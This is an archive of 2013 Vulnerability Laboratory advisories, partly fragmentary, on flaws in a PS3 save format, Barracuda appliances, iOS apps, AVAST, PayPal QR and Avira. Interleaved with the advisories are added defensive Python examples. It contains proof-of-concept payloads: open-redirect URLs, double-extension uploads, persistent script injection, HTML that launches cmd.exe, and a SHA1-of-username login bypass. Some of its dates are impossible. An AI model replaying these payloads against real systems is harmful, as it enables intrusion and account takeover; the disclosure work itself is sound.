any kind of input restriction. Attackers can manipulate the .sfo file of a 
save game to execute system specific commands 
or inject malicious persistent script code out of the save game preview listing.

If you inject standard frames or system unknown commands (jailbreak) without 
passing the filter char by char and syncing directly 
as an update, you will fail to reproduce! 

PoC: PARAM.SFO

ACCOUNT_ID ATTRIBUTE CATEGORY DETAIL PARAMS PARAMS2 PARENTAL_LEVEL 
SAVEDATA_DIRECTORY SAVEDATA_LIST_PARAM SUB_TITLE TITLE
40ac78551a88fdc
SD  
PSHACK: Benjamin Ninja H%20'[PERSISTENT INJECTED SYSTEM COMMAND OR CODE!]

Hackizeit: 1:33:07

ExpSkills: VL-LAB-TRAINING

Operation: 1%
Trojaners: 0%
... 40ac78551a88fdc
...
BLES00371-NARUTO_STORM-0
HACKINGBKM 1
PSHACK: Benjamin Ninja H%20'[PERSISTENT INJECTED SYSTEM COMMAND OR CODE!];



Solution:
=
Restrict the savegame name input and disallow special chars.
Encode the savegame values before redisplaying them in the menu preview of the game.
Parse the strings and values from the savegames even if they are included string by 
string via sync.
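As an added example (not code from the advisory or from Sony), a minimal PARAM.SFO reader that pulls the preview strings out of a save and flags the values a savegame-name filter of the kind described above should reject; the PSF layout (20-byte header, 16-byte index entries, sorted key table) is assumed from public documentation, and build_sfo only constructs the sample file.

```python
import re
import struct

SFO_MAGIC = b"\x00PSF"        # file starts with NUL, 'P', 'S', 'F'
SFO_VERSION = 0x00000101
FMT_UTF8 = 0x0204             # NUL-terminated UTF-8 string
FMT_INT32 = 0x0404            # little-endian 32-bit integer
HEADER_LEN = 20               # magic + version + key_table + data_table + count
INDEX_ENTRY_LEN = 16

# Constructed allowlist for strings the XMB preview displays (TITLE, SUB_TITLE,
# DETAIL): letters, digits, space and a few punctuation marks. Quotes, percent
# signs, brackets and similar characters from the PoC are rejected.
SAFE_TEXT = re.compile(r"[A-Za-z0-9 ._:-]*")
PREVIEW_KEYS = ("TITLE", "SUB_TITLE", "DETAIL")


def _align4(n):
    return (n + 3) & ~3


def build_sfo(entries):
    """Constructed helper: write a PARAM.SFO from {key: str | int}. The key
    table is kept sorted, as in real files."""
    keys = sorted(entries)
    key_table_start = HEADER_LEN + INDEX_ENTRY_LEN * len(keys)
    key_blob = b"".join(k.encode("ascii") + b"\0" for k in keys)
    data_table_start = _align4(key_table_start + len(key_blob))
    index, data_blob, key_off = b"", b"", 0
    for k in keys:
        value = entries[k]
        if isinstance(value, int):
            fmt, payload, max_len = FMT_INT32, struct.pack("<I", value), 4
        else:
            payload = value.encode("utf-8") + b"\0"
            fmt, max_len = FMT_UTF8, _align4(len(payload))
        index += struct.pack("<HHIII", key_off, fmt, len(payload), max_len, len(data_blob))
        data_blob += payload.ljust(max_len, b"\0")
        key_off += len(k) + 1
    header = SFO_MAGIC + struct.pack("<IIII", SFO_VERSION, key_table_start,
                                      data_table_start, len(keys))
    key_table = key_blob.ljust(data_table_start - key_table_start, b"\0")
    return header + index + key_table + data_blob


def parse_sfo(data):
    """Parse PARAM.SFO into {key: value}, refusing entries that point outside
    the file so a corrupted save cannot make the reader read past its end."""
    if len(data) < HEADER_LEN or data[:4] != SFO_MAGIC:
        raise ValueError("not a PSF file")
    _version, key_start, data_start, count = struct.unpack_from("<IIII", data, 4)
    entries = {}
    for i in range(count):
        key_off, fmt, data_len, data_max, data_off = struct.unpack_from(
            "<HHIII", data, HEADER_LEN + INDEX_ENTRY_LEN * i)
        if data_len > data_max or data_start + data_off + data_max > len(data):
            raise ValueError("index entry %d points outside the file" % i)
        key_end = data.index(b"\0", key_start + key_off)
        key = data[key_start + key_off:key_end].decode("ascii")
        raw = data[data_start + data_off:data_start + data_off + data_len]
        if fmt == FMT_INT32:
            entries[key] = struct.unpack("<I", raw)[0]
        else:
            entries[key] = raw.rstrip(b"\0").decode("utf-8", "replace")
    return entries


def unsafe_preview_fields(entries):
    """Return the preview keys whose string value fails the allowlist."""
    return [k for k in PREVIEW_KEYS
            if isinstance(entries.get(k), str) and not SAFE_TEXT.fullmatch(entries[k])]


if __name__ == "__main__":
    # Constructed sample modelled on the PoC: the SUB_TITLE carries the injected text.
    sample = build_sfo({"TITLE": "NARUTO STORM",
                        "SUB_TITLE": "Benjamin Ninja H%20'[INJECT]",
                        "PARENTAL_LEVEL": 0,
                        "SAVEDATA_DIRECTORY": "BLES00371-NARUTO_STORM-0"})
    print(unsafe_preview_fields(parse_sfo(sample)))
```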


Risk:
=
The security risk of the highly exploitable but local vulnerability is estimated 
as critical and needs to be fixed soon.


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri  
(b...@vulnerability-lab.com)


Copyright © 2013 | Vulnerability 
Laboratory

-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com




Trend Micro DirectPass 1.5.0.1060 - Multiple Vulnerabilities

2013-05-22 Thread Vulnerability Lab
 it was the 9th of May.
On the 18th we downloaded the main DirectPass software again and tested the 
core without an update, and it was still vulnerable.
To fix the issue in the software, an update from the update server is required 
after the install.


Risk:
=
1.1
The security risk of the local command/path injection software vulnerability in 
the DirectPass software core is estimated as high(-).

1.2
The security risk of the persistent script code inject vulnerability is 
estimated as medium(+).

1.3
The security risk of the pointer (DoS) software vulnerability is estimated as 
medium(-).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)






Barracuda SSL VPN 680 2.2.2.203 - Redirect Web Vulnerability

2013-05-27 Thread Vulnerability Lab
Title:
==
Barracuda SSL VPN 680 2.2.2.203 - Redirect Web Vulnerability


Date:
=
2013-05-25


References:
===
http://www.vulnerability-lab.com/get_content.php?id=755

Barracuda Networks Security ID (BNSEC): 731


VL-ID:
=
755


Common Vulnerability Scoring System:

1.3


Introduction:
=
The Barracuda SSL VPN is an integrated hardware and software solution enabling 
secure, clientless remote 
access to internal network resources from any Web browser. Designed for remote 
employees and road warriors, 
the Barracuda SSL VPN provides comprehensive control over file systems and 
Web-based applications requiring 
external access. The Barracuda SSL VPN integrates with third-party 
authentication mechanisms to control user 
access levels and provides single sign-on. 

Barracuda SSL VPN   

* Enables access to corporate intranets, file systems or other Web-based 
applications
* Tracks resource access through auditing and reporting facilities
* Scans uploaded files for viruses and malware
* Leverages multi-factor, layered authentication mechanisms, including RSA 
SecurID and VASCO tokens
* Integrates with existing Active Directory and LDAP directories
* Utilizes policies for granular access control framework
* Supports any Web browser on PC or Mac

(Copy of the Vendor Homepage: 
http://www.barracudanetworks.com/ns/products/sslvpn.php)


Abstract:
=
The Vulnerability Laboratory Research Team discovered a redirect vulnerability 
in the official Barracuda Networks SSL VPN 680 v2.2.2.203.


Report-Timeline:

2012-11-11: Researcher Notification & Coordination
2012-11-12: Vendor Notification
2012-11-19: Vendor Response/Feedback
2013-02-20: Vendor Fix/Patch
2012-05-27: Public Disclosure


Status:

Published


Affected Products:
==
Barracuda Networks
Product: SSL VPN 680 2.2.2.203


Exploitation-Technique:
===
Remote


Severity:
=
Low


Details:

A remote (external) redirection vulnerability was detected in the Barracuda SSL 
VPN 680 v2.2.2.203 (Vx) web application appliance.
The bug allows remote attackers to prepare links that perform client side external 
redirects to malware, phishing websites or other malicious 
web content. 

The vulnerability is located in the launchApplication.do request with the resourceId 
parameter: when the resource is loaded via GET, the `returnTo` parameter, meant for an 
internal file redirect, accepts an external target.

Vulnerable Module(s):
[+] launchApplication.do [resourceId]

Vulnerable Parameter(s):
[+] returnTo


Proof of Concept:
=
The vulnerability can be exploited by a remote attacker without a privileged 
application user account but with medium or
high required user interaction. For demonstration or to reproduce ...

1.1
The first URL shows the standard request via GET:
https://sslvpn.127.0.0.1:8080/launchApplication.do?resourceId=1&policy=1&returnTo=%2FshowApplicationShortcuts.do

1.2
The second URL shows the manipulated remote context via GET:
https://sslvpn.127.0.0.1:8080/launchApplication.do?resourceId=1&policy=1&returnTo=http://www.vulnerability-lab.com

https://sslvpn.[SERVER]/[FILE].do?[RES+ID]=x&[POLICY]=x&returnTo=[EXTERNAL TARGET]


Solution:
=
The vulnerability can be patched by allowing only local file requests when 
processing the vulnerable returnTo parameter via GET.
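One way to enforce "local requests only" for returnTo, written as an added example in Python rather than the appliance's own code: the default landing path is taken from the advisory's first request, while the fallback behaviour and the query-string handler are assumptions.

```python
from urllib.parse import parse_qs, unquote, urlsplit

# Landing page from the advisory's standard request; using it as the fallback
# for every rejected value is an assumption of this example.
DEFAULT_RETURN = "/showApplicationShortcuts.do"


def _fully_decode(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding so that %252F is seen as '/'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def safe_return_to(value, default=DEFAULT_RETURN):
    """Accept returnTo only as an absolute path on this host; anything else falls
    back to `default`, so http://..., //host and scheme:... targets never reach
    the Location header."""
    if not value:
        return default
    target = _fully_decode(value).strip()
    # Control characters would allow header splitting; browsers treat a leading
    # "/\" like "//", so backslashes are rejected outright.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in target) or "\\" in target:
        return default
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:
        return default                  # external URL, protocol-relative URL or scheme
    if not target.startswith("/") or target.startswith("//"):
        return default                  # relative name or protocol-relative form
    return target


def launch_application_location(query_string):
    """Compute the redirect target for launchApplication.do from its raw query
    string (resourceId=...&policy=...&returnTo=...)."""
    params = parse_qs(query_string, keep_blank_values=True)
    return safe_return_to(params.get("returnTo", [""])[0])


if __name__ == "__main__":
    # The two requests from the proof of concept above.
    print(launch_application_location(
        "resourceId=1&policy=1&returnTo=%2FshowApplicationShortcuts.do"))
    print(launch_application_location(
        "resourceId=1&policy=1&returnTo=http://www.vulnerability-lab.com"))
```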

2013-02-20: Vendor Fix/Patch


Risk:
=
The security risk of the redirection vulnerability is estimated as low(+).


Credits:

Vulnerability Laboratory [Research Team]  -Chokri Ben Achour 
(meis...@vulnerability-lab.com)
Barracuda Networks [Security Team] - Dave Farrow (Communication & Coordination)



Bluetooth Chat Connect v1.0 iOS - Multiple Vulnerabilities

2013-06-11 Thread Vulnerability Lab
 user name with a 
secure filter mask.
Escape, filter or encode the message listing to prevent the execution of 
persistent script code.

1.2
The denial of service issue can be patched by a secure parse of the collision 
that occurs when the same string is handled twice as a message.


Risk:
=
1.1
The security risk of the persistent input validation web vulnerability in the 
client is estimated as medium(+).

1.2
The security risk of the remote denial of service vulnerability in the client 
is estimated as medium(-).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com) [www.vulnerability-lab.com]






eFile Wifi Transfer Manager 1.0 iOS - Multiple Vulnerabilities

2013-06-28 Thread Vulnerability Lab
; WOW64; rv:21.0) Gecko/20100101 
Firefox/21.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
DNT=1
X-Requested-With=XMLHttpRequest
X-File-Name=1234.png.txt.iso.php.gif
Content-Type=application/octet-stream
Referer=http://localhost:8080/
Content-Length=98139
POSTDATA =?PNG[X]


+ double extensions

http://localhost:8080/[PATH NAME (x) VALUE].png.txt.iso.php


// return false to cancel submit
onSubmit: function(id, fileName){},
onProgress: function(id, fileName, loaded, total){},
onComplete: function(id, fileName, responseJSON){},
onCancel: function(id, fileName){},
// messages
messages: {
    typeError: "{file} has invalid extension. Only {extensions} are allowed.",
    sizeError: "{file} is too large, maximum file size is {sizeLimit}.",
    minSizeError: "{file} is too small, minimum file size is {minSizeLimit}.",
    emptyError: "{file} is empty, please select files again without it.",
    onLeave: "The files are being uploaded, if you leave now the upload will be cancelled."
},
...   ...
// added to list item when upload completes
// used in css to hide progress spinner
success: 'qq-upload-success',
...


1.2
The persistent input validation web vulnerability can be exploited by remote 
attackers without a privileged application user account 
and with low required user interaction. For demonstration or to reproduce ...

New Folder ...

POST http://localhost:8080/# Load Flags[LOAD_DOCUMENT_URI  
LOAD_INITIAL_DOCUMENT_URI  ] 
Content Size[-1] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 
Firefox/21.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://localhost:8080/]
Connection[keep-alive]
Post Data:
newFolder[%2520%3E%22%3C[PERSISTENT INJECTED SCRIPT CODE!]+src%3Da%3E]
submitButton[Create]

Response Headers:
Transfer-Encoding[chunked]
Accept-Ranges[bytes]
Date[Sun, 23 Jun 2013 10:16:41 GMT]


http://localhost:8080/[PATH NAME (x) VALUE]

function newFolder()
{
    var title = document.getElementById("formTitle");
    title.innerText = "eFile";
    title.textContent = "eFile";
    title.setAttribute("id", "formTitle");

    ... ...
    var message = document.getElementById("formMessage");
    message.innerText = "Enter new folder name";
    message.textContent = "Enter new folder name";
    message.setAttribute("id", "formMessage");
    ...


Reference(s):
../pagescript.js


Solution:
=
1.1
The arbitrary file upload vulnerability can be patched by a secure parse and 
restriction in the file upload module and the bound listing access.

1.2
The persistent input validation web vulnerability can be patched by a secure 
parse of the folder name. 
Parse the input fields of the new folder form and also the index output listing to 
prevent persistent injections or script code executions.


Risk:
=
1.1
The security risk of the multiple arbitrary file upload vulnerability and 
restriction bypass is estimated as critical.

1.2
The security risk of the persistent input validation web vulnerability is 
estimated as high.


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@evolution-sec.com)



Mobile USB Drive HD 1.2 - Arbitrary File Upload Vulnerability

2013-06-28 Thread Vulnerability Lab
/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Accept-Language[en-US,en;q=0.5]
  Accept-Encoding[gzip, deflate]
  DNT[1]
  Referer[http://192.168.2.104:8080/]


21:01:43.184[125ms][total 177ms] 
Status: 200[OK]

GET http://192.168.2.104:8080/files/1234.png.txt.iso.php.gif 
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Content Size[98139] Mime Type[application/x-unknown-content-type]

Request Headers:
  Host[192.168.2.104:8080]
  User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Accept-Language[en-US,en;q=0.5]
  Accept-Encoding[gzip, deflate]
  DNT[1]
  Referer[http://192.168.2.104:8080/]
  Connection[keep-alive]
  Cache-Control[max-age=0]

Response Headers:
  Accept-Ranges[bytes]
  Content-Length[98139]
  Date[Do., 27 Jun 2013 19:06:58 GMT]


21:01:43.389[2393ms][total 2393ms] 
Status: 200[OK]
GET http://192.168.2.104:8080/files/1234.png.txt.iso.php.gif 
Load Flags[LOAD_NORMAL] Content Size[98139] Mime Type[application/x-unknown-content-type]

Request Headers:
  Host[192.168.2.104:8080]
  User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Accept-Language[en-US,en;q=0.5]
  Accept-Encoding[gzip, deflate]
  DNT[1]
  Connection[keep-alive]

Response Headers:
  Accept-Ranges[bytes]
  Content-Length[98139]
  Date[Do., 27 Jun 2013 19:07:00 GMT]


Risk:
=
1.1
The security risk of the arbitrary file upload vulnerability and the multiple 
extensions issue are estimated as high.


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@evolution-sec.com)






Barracuda CudaTel 2.6.02.04 - Multiple Web Vulnerabilities

2013-06-28 Thread Vulnerability Lab


Solution:
=
2013-03-14: Vendor Fix/Patch (Barracuda Networks Developer) [Coordination: 
Dave Farrow]

Note: The upgrade is available to all customers of the appliance module and can 
be done automatically or manually in the Barracuda Networks customer center.


Risk:
=
The security risk of the (multiple) client side input validation 
vulnerabilities in the siplist and list module are estimated as medium.


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)






Barracuda CudaTel 2.6.02.04 - Persistent Web Vulnerability

2013-06-28 Thread Vulnerability Lab
Title:
==
Barracuda CudaTel 2.6.02.04 - Persistent Web Vulnerability


Date:
=
2013-06-21


References:
===
http://vulnerability-lab.com/get_content.php?id=777

BARRACUDA NETWORK SECURITY ID: BNSEC-834


VL-ID:
=
777


Common Vulnerability Scoring System:

3.5


Introduction:
=
Designed to enable seamless voice and video communication, the CudaTel 
Communication Server is an easy-to-use, 
affordable, next-generation phone system for businesses. CudaTel Communication 
Server's enterprise-class 
feature set includes Voice over IP (VoIP) PBX services, conferencing, 
follow-me, automated attendant services, 
and more, controlled by an easy-to-use Web interface. CudaTel Communication 
Server is compatible with any SIP 
device and provider, and can be pre-configured for use with both analog and 
digital telephone networks. Powerful, 
Complete Solution: With an expansive feature set and no per user or phone 
licensing fees, the CudaTel 
Communication Server is equipped and priced for organizations of any size. 
Native High Definition audio support 
and integrated phone line (TDM) hardware produces an unparalleled audio 
experience. VoIP encryption protects calls 
from hackers and digital eavesdroppers.

(Copy of the Vendor Homepage: http://www.barracudanetworks.ca/cudatel.aspx )


Abstract:
=
The Vulnerability Laboratory Research Team discovered a client side web 
vulnerability in Barracuda Networks CudaTel v2.6.002.040 appliance application.


Report-Timeline:

2012-11-26: Researcher Notification & Coordination (Chokri Ben Achour)
2012-11-27: Vendor Notification (Barracuda Networks Security Team - Bug Bounty Program)
2013-04-03: Vendor Response/Feedback (Barracuda Networks Security Team - Bug Bounty Program)
2013-05-02: Vendor Fix/Patch (Barracuda Networks Developer Team) [Coordination: Dave Farrow]
2012-06-00: Public Disclosure (Vulnerability Laboratory)


Status:

Published


Affected Products:
==
Barracuda Networks
Product: CudaTel - Communication Server 2.6.002.040


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

The Vulnerability Laboratory Research Team discovered a persistent web 
vulnerability in the Barracuda Networks CudaTel v2.6.002.040 appliance application.
The input validation vulnerability allows remote attackers to inject their own 
malicious persistent script code on the application side of the vulnerable module.

The vulnerability is located in the `find me` module of the `call forwarding` 
function when processing manipulated parameters requested via `add listing`.
Local low privilege application user accounts can inject persistent script code 
to exploit higher privilege web application accounts. 

The remote bug can be exploited by a remote attacker with a low privileged 
application user account and low required user interaction. Successful 
exploitation of the vulnerability results in persistent session hijacking, 
persistent external redirects to malware or malicious sites, persistent phishing 
and persistent web context manipulation (vulnerable module).

Vulnerable Section(s):
[+] Find Me

Vulnerable Module(s):
[+] Call Forwarding - Add

Vulnerable Parameter(s):
[+] Calling Sequence - Listing


Proof of Concept:
=





Solution:
=
The vulnerability can be patched by parsing the listed (output) web context 
after the add operation has been processed.
Also restrict the input fields and disallow special characters or malformed strings.

2013-05-02: Vendor Fix/Patch (Barracuda Networks Developer Team) 
[Coordination: Dave Farrow]


Risk:
=
The security risk of the persistent input validation vulnerability is estimated 
as medium.


Credits:

Vulnerability Laboratory [Research Team] - Chokri Ben Achour 
(meis...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com

AVAST Universal Core Installer - Multiple Vulnerabilities

2013-07-04 Thread Vulnerability Lab
d) Click Next twice until you reach the Installation Information window
e) Scroll down and you should be able to see our injected payload. 
f) If you click on ClickME you should get a CMD shell spawned on the local 
system, hence proving the existence of this vulnerability.
g) If you proceed with the installation and continue, the installation will 
eventually fail, and once again in the final install log you 
will see the executed payload. 

Note: All tests were performed on a system running the latest version of the 
Microsoft Windows 7 OS.


Solution:
=
By default, no user should be allowed to inject HTML code into the application. 
This can be mitigated by performing proper input sanitization of the vulnerable 
fields. 

All illegal characters should also be escaped and the application source code 
should be hardened overall. 
Proper input encoding and format parsing in the source code will fix this issue.


Risk:
=
The security risk of these kinds of vulnerabilities is estimated as medium(+).


Credits:

Vulnerability Laboratory [Research Team] - Ateeq Khan [at...@evolution-sec.com]





Paypal Bug Bounty #102 QR Dev Labs - Auth Bypass Vulnerability

2013-07-05 Thread Vulnerability Lab
Title:
==
Paypal Bug Bounty #102 QR Dev Labs - Auth Bypass Vulnerability


Date:
=
2013-07-05


References:
===
http://www.vulnerability-lab.com/get_content.php?id=995

PayPal Security UID: ZVf25kC


VL-ID:
=
995


Common Vulnerability Scoring System:

7.1


Introduction:
=
Shopping made easy with PayPal QR enabled on your mobile device. You can scan 
for deals using the QR Code displayed in shops, 
train stations, bus stops & banners and purchase items in just a few taps. 
Make the shopping experience easy for your customer.

(Copy of the Vendor Homepage: https://qr.paypal-labs.com )


Abstract:
=
An independent vulnerability laboratory researcher discovered an auth bypass 
web session vulnerability in the PayPal QR Labs Service Web Application.


Report-Timeline:

2012-05-11:Researcher Notification & Coordination (Cernica Ionut)
2013-05-14:Vendor Notification (PayPal Inc Security Incident Team - Bug 
Bounty Program)
2013-06-20:Vendor Fix/Patch (PayPal Inc Developer Team)
2013-07-05:Public Disclosure (Vulnerability Laboratory)


Status:

Published


Affected Products:
==
PayPal Inc
Product: QR Labs Online Service - Web Application 2013 Q2


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

An auth bypass session web vulnerability is detected in the official PayPal QR 
Labs Service Web Application.
The vulnerability allows remote attackers to bypass the web or system user 
authentication of the affected vulnerable computer system to compromise PayPal 
accounts.

The bug is located in the application's account login module when processing 
manipulated j_password parameters loaded via the GET method. Attackers are able 
to decrypt and exchange the information in the live request with a session 
tamper to take over other accounts. In the end the vulnerability allows remote 
attackers to enter any PayPal QR Labs account of the web application remotely.

Exploitation of the vulnerability does not require user interaction, but does 
require a low-privileged PayPal QR Labs application user account. Successful 
exploitation results in account theft or compromise and stable user session 
manipulation with different effects.

Vulnerable Service(s):
[+] PayPal Inc – qr.paypal-labs.com

Vulnerable Module(s):
[+] Account - Login

Vulnerable Parameter(s):
[+] j_password

Affected Module(s):
[+] Account System


Proof of Concept:
=
The vulnerability can be exploited by remote attackers with a low-privileged 
PayPal QR Labs application user account and 
without user interaction. For demonstration or reproduce ...

Note:
After some security checks to authenticate in the qr.paypal-labs.com web 
application, the last request for being authenticated 
in this web application is not implemented securely.

Affected Link:
https://qr.paypal-labs.com/j_security_check?j_username=loger...@gmail.com&j_password=96301aa9f02b5d12278b0e902dc5434ed9477d19

Note:
If we look at the request, which is a GET method request, we will soon see ...
If we hash the j_username parameter value with SHA1 ... 
the result will be the value of the j_password parameter.

Note: PoC Video
The username loger...@gmail.com hashed with SHA1 equals 
96301aa9f02b5d12278b0e902dc5434ed9477d19.
In the demonstration above it seems that the password of the username is 
just SHA1-hashed ;)
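As an added defender-side check (not part of the original advisory and not PayPal's code), the Python below parses a j_security_check request of the shape shown above, flags it when the j_password value is nothing but SHA1(j_username), and contrasts that with how a server should actually verify a password. The username and hash it uses are constructed, since the advisory's own values are redacted.

```python
import hashlib
import hmac
import os
from urllib.parse import parse_qs, urlsplit

# Constructed sample, modelled on the advisory's affected link. The real
# username and hash in the advisory are redacted, so these are made up here.
SAMPLE_USER = "user@example.com"
SAMPLE_URL = (
    "https://qr.paypal-labs.com/j_security_check?j_username="
    + SAMPLE_USER
    + "&j_password="
    + hashlib.sha1(SAMPLE_USER.encode()).hexdigest()
)


def parse_login_request(url):
    """Return (username, password) from a j_security_check URL, else None."""
    parts = urlsplit(url)
    if not parts.path.endswith("/j_security_check"):
        return None
    qs = parse_qs(parts.query)
    user = qs.get("j_username", [None])[0]
    password = qs.get("j_password", [None])[0]
    if user is None or password is None:
        return None
    return user, password


def findings_for(url):
    """Defender-side review of one login request.

    Returns the list of issues found; an empty list means nothing flagged."""
    issues = []
    parsed = parse_login_request(url)
    if parsed is None:
        return issues
    user, password = parsed
    # Credentials in a GET query string land in server logs, proxies and
    # browser history; a login form should be POSTed.
    issues.append("credentials passed in GET query string")
    # The advisory's core point: the password value is just SHA1(username),
    # so anyone who knows the username can reproduce it.
    if password.lower() == hashlib.sha1(user.encode()).hexdigest():
        issues.append("j_password equals SHA1(j_username)")
    return issues


# What a server should do instead: derive a salted, slow hash from the
# user's real secret and compare it in constant time.
def make_password_record(password, salt=None, iterations=200_000):
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt, "iterations": iterations, "digest": digest}


def verify_password(record, candidate):
    digest = hashlib.pbkdf2_hmac(
        "sha256", candidate.encode(), record["salt"], record["iterations"]
    )
    return hmac.compare_digest(digest, record["digest"])


if __name__ == "__main__":
    for issue in findings_for(SAMPLE_URL):
        print("FINDING:", issue)
    record = make_password_record("correct horse battery staple")
    print(verify_password(record, "correct horse battery staple"))  # True
    print(verify_password(record, "wrong password"))  # False
```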


Solution:
=
2013-06-20:Vendor Fix/Patch (PayPal Inc Developer Team)


Risk:
=
The security risk of the auth bypass web session vulnerability is estimated as 
high(+).


Credits:

Independent Security Researcher – Cernica Ionut Cosmin 
(ionut.cern...@whit3hat.com)



AVAST Antivirus v8.0.1489 - Multiple Core Vulnerabilities

2013-07-05 Thread Vulnerability Lab
c) Scroll down to the `Offline Registration` section and click on ``Enter the 
License Key``
d) Enter the following payload <h1>Vulnerable</h1> and click OK
e) You should now see the entered string `Vulnerable` in Heading 1 format, 
proving the existence of this vulnerability.



Proof of Concept #2 Local Image File Include

For reproducing the local file include through the img tag bug successfully, 
please follow the steps below:

a) Right Click on Avast Tray Icon and click on ``Registration Information``
b) Scroll down to the `Offline Registration` section and click on ``Enter the 
License Key``
c) Enter the following payload <img src="file:///YOURFILE"></img> and click OK
d) You should now see the local image file loaded successfully from your system, 
proving the existence of this vulnerability.

Note:
For PoC #2 I copied a file called logo.png to my C:/ folder and used the 
following payload to produce the bug: <img src="file:///C:/logo.png"></img>



Proof of Concept #3 Command Shell on Local System (cmd.exe)

For reproducing the bug, please follow the steps below:

a) Right Click on Avast Tray Icon and click on ``Registration Information``
b) Scroll down to the `Offline Registration` section and click on ``Enter the 
License Key``
c) Enter the following payload <a href="cmd"> and click OK
d) You should now see the cmd.exe file loaded successfully from your system, 
proving the existence of this vulnerability.
e) You can also use the payloads mentioned under the next section for some 
interesting results:


Interesting Payloads:

<a href="test.com">
<a href="explorer.exe">
a href=
<a href="shell:System">
<a href="calc">
<a href="mspaint.exe">
<a href="notepad.exe">

Please note: All tests were performed on a system running the latest version of 
the Microsoft Windows 7 OS.


POC Technical Description 
Here, we used the common HTML tags as our payload. The fact that user-injected 
HTML code is being executed successfully raises concerns for this core 
application's security. Then, the fact that using just the a href tag we can 
easily bypass the AVAST sandbox and gain a local system shell with the privileges 
of the user that initially installed the application, which in most cases will be 
administrator, is very critical. I believe this bug can be further escalated to 
gain more interesting results. I also wanted to test the license file for input 
validation but I haven't been able to perform that test yet due to not having 
access to a proper license file. I intend to test that feature because I 
believe it might also be vulnerable.


Solution:
=
By default, no user should be allowed to inject HTML code into the application. 
This can be mitigated by performing proper input sanitization 
of the vulnerable fields. All illegal characters should also be escaped and the 
application source code should be hardened overall. 
Proper input sanitization in the source code will fix this issue.



Risk:
=
The security risk of the detected software vulnerabilities is estimated as 
medium(+).



Credits:

Vulnerability Laboratory [Research Team] - Ateeq Khan 
[at...@vulnerability-lab.com]



Avira Analysis Web Service - SQL Injection Vulnerability

2013-07-08 Thread Vulnerability Lab
Title:
==
Avira Analysis Web Service - SQL Injection Vulnerability


Date:
=
2013-07-08


References:
===
http://www.vulnerability-lab.com/get_content.php?id=997


VL-ID:
=
997


Common Vulnerability Scoring System:

8.5


Abstract:
=
The Vulnerability Laboratory Core Research Team discovered a critical SQL 
Injection vulnerability in the Avira Analysis online service application.


Report-Timeline:

2013-05-25:Vendor Notification
2013-05-26:Vendor Response/Feedback
2013-06-31:Vendor Fix/Patch
2013-07-08:Public Disclosure


Status:

Published


Affected Products:
==
Avira
Product: Analysis - Web Application & Online Service 2013 Q2


Exploitation-Technique:
===
Remote


Severity:
=
Critical


Details:

A remote SQL injection web vulnerability is detected in the official 
Avira Analysis online service application.
The vulnerability allows remote attackers to inject their own SQL commands to 
compromise the affected application's DBMS.

The SQL injection vulnerability is located in the `overview` file when 
processing a request with a manipulated `uniqueid` parameter. 
By manipulating the `uniqueid` parameter, attackers can inject their own SQL 
commands to compromise the web server application's DBMS. 

When trying to bypass the filter validation with a single quote or a double 
quote to check whether the parameter is vulnerable or not, 
attackers are redirected to another page; but when the request is made 
with a backslash, the context is executed 
and new MySQL errors become visible for exploitation.

The vulnerability can be exploited by remote attackers without a privileged 
application user account and without required user interaction. 
Successful exploitation of the SQL injection vulnerability results in 
compromise of the web application and online service DBMS.

Vulnerable Module(s):
[+] en

Vulnerable File(s):
[+] overview

Vulnerable Parameter(s):
[+] uniqueid


Proof of Concept:
=
The remote SQL injection web vulnerability can be exploited by remote attackers 
without a privileged application user account and without 
required user interaction. For demonstration or reproduce ...

Vulnerable Service Domain:  analysis.avira.com
Vulnerable Module:  en
Vulnerable File:overview
Vulnerable Parameter:   uniqueid


